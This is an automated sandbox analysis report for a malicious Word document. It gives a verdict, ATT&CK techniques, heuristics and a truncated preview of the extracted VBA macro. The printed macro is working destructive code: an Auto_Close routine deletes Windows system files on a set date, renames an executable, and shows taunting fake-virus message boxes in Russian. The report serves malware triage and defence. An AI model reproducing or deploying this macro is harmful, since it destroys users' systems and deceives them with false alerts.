Verdict: MALICIOUS
Risk Score: 142
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1491.001 Defacement: Content Spoofing
T1070.004 File Deletion
T1564.001 Hidden Files and Directories
The sample contains a VBA macro with an Auto_Close subroutine, which is a common technique for executing malicious code upon document closure. The script attempts to delete files from Windows directories and rename a legitimate executable, indicating destructive or disruptive intent. The messages displayed to the user are also indicative of a trojan, possibly attempting to mislead or taunt the user.
Heuristics (5)
- ClamAV: Doc.Trojan.Killer-9 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Killer-9
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9063 bytes |

SHA-256: 4276018ccd0fa5e48cfd502dff28d0830cbff8b291ce30b7be9fc3258bd47b2b
Detection (ClamAV): No threats found
Obfuscation or payload: likely. Carved artifact contains 2 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Declare Function mciSendString Lib "winmm.dll" _
Alias "mciSendStringA" (ByVal lpstrCommand As String, _
ByVal lpstrReturnString As String, ByVal uReturnLength As Long, _
ByVal hwndCallback As Long) As Long
Sub autoclose()
On Error Resume Next
If Month(Now()) = 9 And Day(Now()) = 11 Then
Kill "C:\WINDOWS\*.*"
Kill "C:\WINDOWS\system32\*.*"
Kill "C:\WINDOWS\system\*.*"
MsgBox "-------НЕУДАЧНЫЙ ДЕНЬ--------", vbCritical, "GAME OVER"
Else
If Month(Now()) = Day(Now()) Then
OldName = "C:\Program Files\Winamp\winamp.exe"
NewName = "C:\Program Files\Winamp\winamp.dll"
Name OldName As NewName
MsgBox " Невожможно закрыть Microsoft Word ", vbCritical, "Error"
MsgBox " WARNING!!! Virus Alert ", vbExclamation
MsgBox " Обнаружен вирус Trojan.Apokalipse.990eERR", vbCritical
MsgBox " RSXCЪХЪЖХ}>}{}::P_p][p-BHG}{LPJBG(&*(&%*(*&^)UgyuFRCHGVFMPK)J?>HYt"
MsgBox " Hi, Lamer !!! }:}:>}:L{>{:}{:|}:}{L{LLL}L}", 0, "For Lamer"
MsgBox " My Name is Debuger ", vbInformation, "Debuger"
MsgBox " Хочешь закрыть Word??? ", 4, "Debuger"
MsgBox " Чего мучаешся, Hacker галимый @@@@@@@@@@@@@@@@@@@@@@@@____________", 5, "Debuger"
MsgBox " Я вижу у тебя винда нелицензионная (:(:(:(:(:(:(:(:(:(: ", 0, "Debuger"
MsgBox "............и проги пиратские............................................", 0, "Debuger"
MsgBox " Да ты ещё музло бесплатно слушаешьХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХХ", o, "Debuger"
MsgBox " ПИРАТСТВУ------------БОЙ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ", 3, "Debuger"
MsgBox " Сколько можно жать ОК?][;]=;];=[;.]l;][;];] ", vbQuestion, "Debuger"
MsgBox " ];]=90=9 На компе много ДЕРЬМА ", vbExclamation, "Debuger"
MsgBox "+++++++Gih Прочистим мозги", 2, "Debuger"
MsgBox " gvycgdevccvvuebvfuvcbidcdhcvhjfbdfverbvhdfbvkfbvierbvhbvjkdfvnoerghuerionvfjkefvyuidfubvdfjvnuifbvkdfbvdkfvnonflvncjkfvnjkfdbvjkdfbvkdfjvnfjvbkjbvuivnuiervervyucvrycbicvyurcbuecvrcbuybcirbibvfiriebvuerbvierburbvuierncvruifnuierbfverubfveruobvierbvfuirvnuirencvoeruveruibverbvurbuirnfvornfvoerbvroebvoerbviorbvioerbvfiorbvoribvoribvfrobvrbviorebfriwebfrobvfrebvernvriovfnerofnvgeriogeyfrfjriofhuierfhукенг4ен45гео5щзеш9045негш5рагшпнгкацалукпаклалдукрпгшуимукмшщутмзщукмлщзукаомщзукпошщукрпущкпвсмцуенчмцугчмцугтчшцусишцусишцувшщцумаецумвуоварукаьпармкукрпгшукткщмьакрскнцаицукаиукшциаукшипвасросикрсммаируксмтииамрамолватмолпаимгпруеимшимолмтолпаимитмшваипмним ариммишимраимимримримароимримрогаимроваимроимимрваимроаимроваимолваимроваимимроимроваимроиамроваимроаимроваимрмуаолмтшщукатукшщмукгшимугпампасвфывпрчсфыачмвпрсмвмсгуисукиаукцрсиукгисуксиксиушксишксткрмпапмсгкцумснгксмцукгисрогцукисукрсикотсшцукрсицукгсикимасисшцкиксмукрцсикшцурукимааиксишцуксиукгсиушкроимаугшмикущмукшщиммщуктмщ", vbCritical, "Debuger"
MsgBox "тЫ мНе НаДоЕл", 3, "Debuger"
MsgBox "___________________________________________________И комп у тебя отстой____________________________________", o, "Debuger"
MsgBox " Пока ты фигнёй страдал твоё пиратское Гавно смылось в Унитаз", vbInformation, "Debuger"
MsgBox " URA!!! URA!!! URA!!! ", 0, "Debuger"
MsgBox "NJ тО ЛИ ещё будет///////////////////////////////", 2, "Debuger"
MsgBox "----ХОРОШИЙ ВИНТ-ЧИСТЫЙ ВИНТ----", vbCritical, "Format\: C"
MsgBox " Ну вот и началось самое Интересное", vbInformation, "Debuger"
Else
MsgBox " Невожможно закрыть Microsoft Word ", vbCritical, "Error"
MsgBox " WARNING!!! Virus Alert ", vbExclamation
MsgBox " Обнаружен вирус Trojan.Apokalipse.990eERR", vbCritical
MsgBox " RSXCЪ
... (truncated)